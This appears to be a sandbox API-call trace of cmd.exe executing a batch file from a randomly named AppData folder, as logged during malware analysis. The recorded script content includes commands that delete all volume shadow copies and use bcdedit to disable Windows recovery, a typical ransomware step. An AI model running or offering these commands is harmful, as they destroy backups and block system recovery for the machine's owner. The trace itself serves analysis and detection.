_get_osfhandle (_FileHandle=1) returned 0x7 [0178.656] GetFileType (hFile=0x7) returned 0x2 [0178.656] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0178.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.656] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0178.657] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0178.657] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0178.657] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0178.657] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0178.657] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0178.657] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0178.657] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0178.657] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0178.657] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0178.657] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0178.657] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.657] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x28f254 | out: _Buffer="CiOHhXJTCFVtKQz1Zuv\r\n") returned 21 [0178.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.657] GetFileType (hFile=0x7) returned 0x2 [0178.657] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.657] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f214 | out: lpMode=0x28f214) returned 1 [0178.657] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.657] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x28f240, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f240*=0x15) returned 1 [0178.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.658] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.658] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.658] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0178.658] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.658] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0178.658] SetConsoleInputExeNameW () returned 0x1 [0178.658] GetConsoleOutputCP () returned 0x1b5 [0178.659] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0178.659] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.659] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0178.659] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0178.659] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.659] SetFilePointer (in: hFile=0x58, lDistanceToMove=269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10d [0178.659] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.659] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10d [0178.659] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x12f, lpOverlapped=0x0) returned 1 [0178.659] SetFilePointer (in: hFile=0x58, lDistanceToMove=291, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x123 [0178.660] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=22, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 10 localhost\r\nuv\r\nte \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\n") returned 22 [0178.660] GetFileType (hFile=0x58) returned 0x1 [0178.660] _get_osfhandle (_FileHandle=3) returned 0x58 [0178.660] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x123 [0178.660] _tell (_FileHandle=3) returned 291 [0178.660] _close (_FileHandle=3) returned 0 [0178.661] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0178.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.661] GetFileType (hFile=0x7) returned 0x2 [0178.661] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.661] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0178.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.661] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0178.661] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.661] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0178.661] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0178.661] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.661] GetFileType (hFile=0x7) returned 0x2 [0178.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.662] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0178.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.662] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0178.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.662] GetFileType (hFile=0x7) returned 0x2 [0178.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.662] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6c4 | out: lpMode=0x28f6c4) returned 1 [0178.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.662] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a0d90*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x28f6f0, lpReserved=0x0 | out: lpBuffer=0x4a0d90*, lpNumberOfCharsWritten=0x28f6f0*=0x4) returned 1 [0178.662] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6fc | out: _Buffer=" -n 10 localhost ") returned 17 [0178.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.662] GetFileType (hFile=0x7) returned 0x2 [0178.663] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.663] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6bc | out: lpMode=0x28f6bc) returned 1 [0178.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.663] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x28f6e8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6e8*=0x11) returned 1 [0178.663] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f71c | out: _Buffer="\r\n") returned 2 [0178.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.663] GetFileType (hFile=0x7) returned 0x2 [0178.663] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0178.663] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6dc | out: lpMode=0x28f6dc) returned 1 [0178.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.663] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f708, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f708*=0x2) returned 1 [0178.664] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0178.664] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0178.664] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0178.664] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0178.664] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0178.664] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0178.664] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0178.664] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0178.664] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0178.664] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0178.664] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0178.664] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0178.664] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0178.664] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0178.664] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0178.664] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0178.664] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0178.664] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0178.664] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0178.664] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0178.664] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0178.664] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0178.664] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0178.664] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0178.664] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0178.664] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0178.664] _wcsicmp (_String1="ping", _String2="START") returned -3 [0178.664] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0178.664] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0178.664] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0178.664] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0178.664] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0178.664] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0178.664] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0178.664] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0178.664] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0178.664] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0178.664] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.664] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.665] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.665] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0178.665] GetLastError () returned 0x2 [0178.665] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0178.665] GetLastError () returned 0x2 [0178.665] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0x491de0 [0178.665] FindClose (in: hFindFile=0x491de0 | out: hFindFile=0x491de0) returned 1 [0178.665] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0xffffffff [0178.665] GetLastError () returned 0x2 [0178.665] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28f23c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f23c) returned 0x491de0 [0178.666] FindClose (in: hFindFile=0x491de0 | out: hFindFile=0x491de0) returned 1 [0178.666] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.666] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.666] GetConsoleTitleW (in: lpConsoleTitle=0x28f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.666] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.666] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.666] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.666] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0178.666] GetLastError () returned 0x2 [0178.666] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0178.667] GetLastError () returned 0x2 [0178.667] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0x4921c8 [0178.667] FindClose (in: hFindFile=0x4921c8 | out: hFindFile=0x4921c8) returned 1 [0178.667] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0xffffffff [0178.667] GetLastError () returned 0x2 [0178.667] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x28eb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eb28) returned 0x4921c8 [0178.667] FindClose (in: hFindFile=0x4921c8 | out: hFindFile=0x4921c8) returned 1 [0178.667] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.667] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.667] GetConsoleTitleW (in: lpConsoleTitle=0x28f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.667] InitializeProcThreadAttributeList (in: lpAttributeList=0x28eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef70 | out: lpAttributeList=0x28eea8, lpSize=0x28ef70) returned 1 [0178.667] UpdateProcThreadAttribute (in: lpAttributeList=0x28eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28eea8, lpPreviousValue=0x0) returned 1 [0178.667] GetStartupInfoW (in: lpStartupInfo=0x28ee64 | out: lpStartupInfo=0x28ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0178.668] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0178.668] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 10 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 10 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28ef50 | out: lpCommandLine="ping -n 10 localhost", lpProcessInformation=0x28ef50*(hProcess=0x54, hThread=0x58, dwProcessId=0xca4, dwThreadId=0x5fc)) returned 1 [0178.670] CloseHandle (hObject=0x58) returned 1 [0178.670] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.670] GetEnvironmentStringsW () returned 0x4a0548* [0178.670] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0178.670] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0190.490] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x28ee44 | out: lpExitCode=0x28ee44*=0x0) returned 1 [0190.490] CloseHandle (hObject=0x54) returned 1 [0190.490] _vsnwprintf (in: _Buffer=0x28ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ee50 | out: _Buffer="00000000") returned 8 [0190.490] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0190.490] GetEnvironmentStringsW () returned 0x4a0548* [0190.490] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0190.490] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0190.490] GetEnvironmentStringsW () returned 0x4a0548* [0190.491] FreeEnvironmentStringsW (penv=0x4a0548) returned 1 [0190.491] DeleteProcThreadAttributeList (in: lpAttributeList=0x28eea8 | out: lpAttributeList=0x28eea8) [0190.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.491] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0190.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.491] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0190.491] _get_osfhandle (_FileHandle=0) returned 0x3 [0190.491] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0190.491] SetConsoleInputExeNameW () returned 0x1 [0190.491] GetConsoleOutputCP () returned 0x1b5 [0190.491] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.491] SetThreadUILanguage (LangId=0x0) returned 0x409 [0190.491] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0190.492] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0190.492] _get_osfhandle (_FileHandle=3) returned 0x54 [0190.492] SetFilePointer (in: hFile=0x54, lDistanceToMove=291, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x123 [0190.492] _get_osfhandle (_FileHandle=3) returned 0x54 [0190.492] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x123 [0190.492] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f6a8*=0x119, lpOverlapped=0x0) returned 1 [0190.493] SetFilePointer (in: hFile=0x54, lDistanceToMove=455, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c7 [0190.493] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=164, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="cmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\natuspolicy ignoreallfailures\"\r\n") returned 164 [0190.493] GetFileType (hFile=0x54) returned 0x1 [0190.493] _get_osfhandle (_FileHandle=3) returned 0x54 [0190.493] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c7 [0190.495] _tell (_FileHandle=3) returned 455 [0190.495] _close (_FileHandle=3) returned 0 [0190.495] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f47c | out: _Buffer="\r\n") returned 2 [0190.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.495] GetFileType (hFile=0x7) returned 0x2 [0190.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.495] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f43c | out: lpMode=0x28f43c) returned 1 [0190.495] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.495] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f468, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f468*=0x2) returned 1 [0190.496] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0190.496] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.496] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f478 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0190.496] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f478 | out: _Buffer=">") returned 1 [0190.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.496] GetFileType (hFile=0x7) returned 0x2 [0190.496] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.496] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f440 | out: lpMode=0x28f440) returned 1 [0190.496] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.496] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x28f46c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x28f46c*=0x19) returned 1 [0190.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.497] GetFileType (hFile=0x7) returned 0x2 [0190.497] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f694 | out: lpMode=0x28f694) returned 1 [0190.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.497] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x491bd0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x28f6c0, lpReserved=0x0 | out: lpBuffer=0x491bd0*, lpNumberOfCharsWritten=0x28f6c0*=0x7) returned 1 [0190.497] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x28f6cc | out: _Buffer=" /C vssadmin.exe delete shadows /all /quiet ") returned 45 [0190.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.497] GetFileType (hFile=0x7) returned 0x2 [0190.497] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f68c | out: lpMode=0x28f68c) returned 1 [0190.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.497] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x28f6b8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6b8*=0x2d) returned 1 [0190.498] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x28f6e8 | out: _Buffer=" & ") returned 3 [0190.498] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.498] GetFileType (hFile=0x7) returned 0x2 [0190.498] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.498] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f6a8 | out: lpMode=0x28f6a8) returned 1 [0190.498] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.498] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x28f6d4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f6d4*=0x3) returned 1 [0190.498] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.498] GetFileType (hFile=0x7) returned 0x2 [0190.499] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0190.499] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f664 | out: lpMode=0x28f664) returned 1 [0190.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0190.499] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x48eb68*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x28f690, lpReserved=0x0 | out: lpBuffer=0x48eb68*, lpNumberOfCharsWritten=0x28f690*=0xb) returned 1 [0190.499] _vsnwprintf (in: 